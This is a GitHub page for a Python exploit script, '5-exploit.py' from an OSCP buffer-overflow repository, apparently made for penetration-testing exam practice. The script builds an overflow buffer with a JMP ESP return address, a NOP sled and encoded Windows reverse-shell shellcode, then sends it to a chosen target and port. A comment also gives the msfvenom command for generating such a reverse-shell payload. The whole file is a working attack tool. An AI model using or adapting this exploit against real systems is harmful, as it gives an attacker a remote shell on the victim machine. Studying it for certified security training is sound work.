OSCP_BoF/5-exploit.py at main · Yanixos/OSCP_BoF · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python3

from utils import *
import struct
import sys
import os


def exploit(bof_val, eip_off, jmp_esp) :

    print("[*] Start your listener...")
    input("[!] If your listener is started, press anykey...\n")


    # msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT EXITFUNC=thread -a x86 --platform windows -b "BAD_CHARS" -e x86/shikata_ga_nai -f c
    shellcode= ("\xba\x70\x8e\x20\x12\xdb\xd3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
                "\x52\x83\xc7\x04\x31\x57\x0e\x03\x27\x80\xc2\xe7\x3b\x74\x80"
                "\x08\xc3\x85\xe5\x81\x26\xb4\x25\xf5\x23\xe7\x95\x7d\x61\x04"
                "\x5d\xd3\x91\x9f\x13\xfc\x96\x28\x99\xda\x99\xa9\xb2\x1f\xb8"
                "\x29\xc9\x73\x1a\x13\x02\x86\x5b\x54\x7f\x6b\x09\x0d\x0b\xde"
                "\xbd\x3a\x41\xe3\x36\x70\x47\x63\xab\xc1\x66\x42\x7a\x59\x31"
                "\x44\x7d\x8e\x49\xcd\x65\xd3\x74\x87\x1e\x27\x02\x16\xf6\x79"
                "\xeb\xb5\x37\xb6\x1e\xc7\x70\x71\xc1\xb2\x88\x81\x7c\xc5\x4f"
                "\xfb\x5a\x40\x4b\x5b\x28\xf2\xb7\x5d\xfd\x65\x3c\x51\x4a\xe1"
                "\x1a\x76\x4d\x26\x11\x82\xc6\xc9\xf5\x02\x9c\xed\xd1\x4f\x46"
                "\x8f\x40\x2a\x29\xb0\x92\x95\x96\x14\xd9\x38\xc2\x24\x80\x54"
                "\x27\x05\x3a\xa5\x2f\x1e\x49\x97\xf0\xb4\xc5\x9b\x79\x13\x12"
                "\xdb\x53\xe3\x8c\x22\x5c\x14\x85\xe0\x08\x44\xbd\xc1\x30\x0f"
                "\x3d\xed\xe4\x80\x6d\x41\x57\x61\xdd\x21\x07\x09\x37\xae\x78"
                "\x29\x38\x64\x11\xc0\xc3\xef\x14\x1c\x03\xc0\x40\x1c\x93\x38"
                "\x9e\xa9\x75\x2c\xb0\xff\x2e\xd9\x29\x5a\xa4\x78\xb5\x70\xc1"
                "\xbb\x3d\x77\x36\x75\xb6\xf2\x24\xe2\x36\x49\x16\xa5\x49\x67"
                "\x3e\x29\xdb\xec\xbe\x24\xc0\xba\xe9\x61\x36\xb3\x7f\x9c\x61"
                "\x6d\x9d\x5d\xf7\x56\x25\xba\xc4\x59\xa4\x4f\x70\x7e\xb6\x89"
                "\x79\x3a\xe2\x45\x2c\x94\x5c\x20\x86\x56\x36\xfa\x75\x31\xde"
                "\x7b\xb6\x82\x98\x83\x93\x74\x44\x35\x4a\xc1\x7b\xfa\x1a\xc5"
                "\x04\xe6\xba\x2a\xdf\xa2\xdb\xc8\xf5\xde\x73\x55\x9c\x62\x1e"
                "\x66\x4b\xa0\x27\xe5\x79\x59\xdc\xf5\x08\x5c\x98\xb1\xe1\x2c"
                "\xb1\x57\x05\x82\xb2\x7d")


    jmp_esp = struct.pack("<I", jmp_esp).decode('raw_unicode_escape')
    buffer = "A" * eip_off + jmp_esp + "\x90" * 16 + shellcode + "\x90" * (bof_val - eip_off - 4 - 16 - len(shellcode))

    print("[*] Launching exploit...")
    connect_send(target, port, buffer)

if __name__ == "__main__" :

    if len(sys.argv) != 6 :
        print("[!] Usage: {} 'target' 'port' 'overflow value' 'eip offset' 'jmp_esp_address' ".format(sys.argv[0]))
        sys.exit(1)

    target  = sys.argv[1]
    port    = int(sys.argv[2])
    bof_val = int(sys.argv[3])
    eip_off = int(sys.argv[4])
    jmp_esp = int(sys.argv[5], 16)

    exploit(bof_val, eip_off, jmp_esp)